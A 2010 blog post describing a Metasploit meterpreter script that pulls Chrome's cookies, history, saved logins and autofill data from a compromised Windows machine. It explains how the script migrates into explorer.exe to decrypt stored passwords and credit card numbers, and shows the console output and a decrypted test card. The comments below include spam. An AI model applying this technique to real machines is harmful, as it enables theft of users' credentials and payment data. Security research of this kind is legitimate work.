Monday, September 20, 2010

Meterpreter Script to extract chrome browser data

About two months ago, Jeremiah Grossman found a a nice way to exploit the form autofill feature of the Safari browser to extract the stored data.
A few days later Google announced that Chrome 6 will support form autofill including credit card information.

I was curious how the data is stored and the metasploit project was missing a meterpreter script to extract chrome browser data anyway, so I created one.

The information is stored in sqlite databases and some JSON files. The script downloads these and extracts the useful information from the databases, storing the data in JSON dumps so it is both human readable and easy to parse.

The most sensitive data (auto fill passwords and credit card numbers) is encrypted using the Windows function CryptProtectData:
"Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data. In addition, the encryption and decryption usually must be done on the same computer."

To decrypt the data, the script calls the CryptUnprotectData function on the target system using the new railgun meterpreter extension.
To make this work, the process on the target system running meterpreter needs to be owned by the user the data belongs to, so this does not work with SYSTEM privileges.
To get the data of the currently logged on user, the script allows to automatically migrate into the exlorer.exe process and, after the decryption is done, back into the original process.

The following shows the console output of the script:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run enum_chrome -m
[*] current PID is 1100. migrating into explorer.exe, PID=2916...
[*] done.
[*] running as user 'VM-WINXP\test'...
[*] extracting data for user 'test'...
[*] downloading file Web Data to '/home/sven/.msf3/logs/scripts/enum_chrome/ Data'...
[*] downloading file Cookies to '/home/sven/.msf3/logs/scripts/enum_chrome/'...
[*] downloading file History to '/home/sven/.msf3/logs/scripts/enum_chrome/'...
[*] downloading file Login Data to '/home/sven/.msf3/logs/scripts/enum_chrome/ Data'...
[*] downloading file Bookmarks to '/home/sven/.msf3/logs/scripts/enum_chrome/'...
[*] downloading file Preferences to '/home/sven/.msf3/logs/scripts/enum_chrome/'...
[*] creating file 'autofill.json'...
[*] creating file 'autofill_profiles.json'...
[*] creating file 'autofill_credit_cards.json'...
[*] decrypting field 'card_number_encrypted'...
[*] creating file 'cookies.json'...
[*] creating file 'history.json'...
[*] creating file 'logins.json'...
[*] creating file 'bookmarks.json'...
[*] creating file 'preferences.json'...
[*] migrating back into PID=1100...
[*] done.
meterpreter >

The file 'autofill_credit_cards.json' contains the following (the field "card_number_encrypted_decrypted" gets added by the script):
    "label": "",
    "verification_code_encrypted": "",
    "unique_id": 1,
    "expiration_year": 2010,
    "card_number": "",
    "shipping_address": "",
    "type": "",
    "card_number_encrypted": "\u0001\u0000\u0000\u0000Ð~L~]ß\u0001\u0015Ñ\u0011~Lz\u0000ÀOÂ~Wë\u0001\u0000\u0000\u0000/\u0006E\u000eú«}N~LÁ\u001bjÍ5\u0004~\\u0000\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0000\u0000\u0003f\u0000\u0000¨\u0000\u0000\u0000\u0010\u0000\u0000\u0000Ú½[~LökºíaÂAÕ\u0013ÖoÚ\u0000\u0000\u0000\u0000\u0004~@\u0000\u0000| \u0000\u0000\u0000\u0010\u0000\u0000\u0000~Eî\\uFÎrgé|i¬.\u0002~P~I\u0018\u0000\u0000\u0000~N£Hvß~FÃÀê%á6h¢Q~Q;j NØ\u0002m±\u0014\u0000\u0000\u0000Yö|#~\~A°µ±ù~Zå·®\u0007éJ~KyÓ",
    "billing_address": "",
    "expiration_month": 12,
    "verification_code": "",
    "name_on_card": "Test Card",
    "card_number_encrypted_decrypted": "0123456789012345"

You can download the script here:


  1. Hi,

    Metasploit v3.4.2 not supported ? Running BackTrack 4. Can you update your script.

  2. شركتنا من المتميزون في اعمال الاصلاح بدون هدم او تكسير من خلال شركة ركن البيت التي تقدم الكثير والكثير في عمل اللازم وتصحيح الاخطاء التي تسببها تسريبات المياه فنحن مثلا

    شركة كشف تسربات المياه بجدة تقدم خدمة لعمل الاصلاح بدون اي خراب ونقدم النصيحة للعملاء بالابتعاد عن الاعمال التي تؤدي الي هذا الخراب فتعاملك مع شركة كشف تسربات بجدة لديها الخبرة الكافية تساعدك في الحفاظ علي منزلك كما اننا نتمكن في اننا سوف نرتقي بخدمة لاننا نقوم بالعمل السليم لها كما يوجد لدينا خدمات العوازل التي تمنع التسريبات من الاسقف لكم والحوائط والخزانات من خلال شركة تسمي الاولي في مجالها لذلك نحن نقدم شركة عزل خزانات بالرياض التي تعتبر في عل الخزانات الارضية من الداخل بواسطة مواد متميزة كما نقدم لكم شركة عزل اسطح بالرياض لعمل العوازل التي تمنع جميع التسريبات في الاسقف

  3. I have bookmarked your blog, the articles are way better than other similar blogs.. thanks for a great blog! Download UC browser mini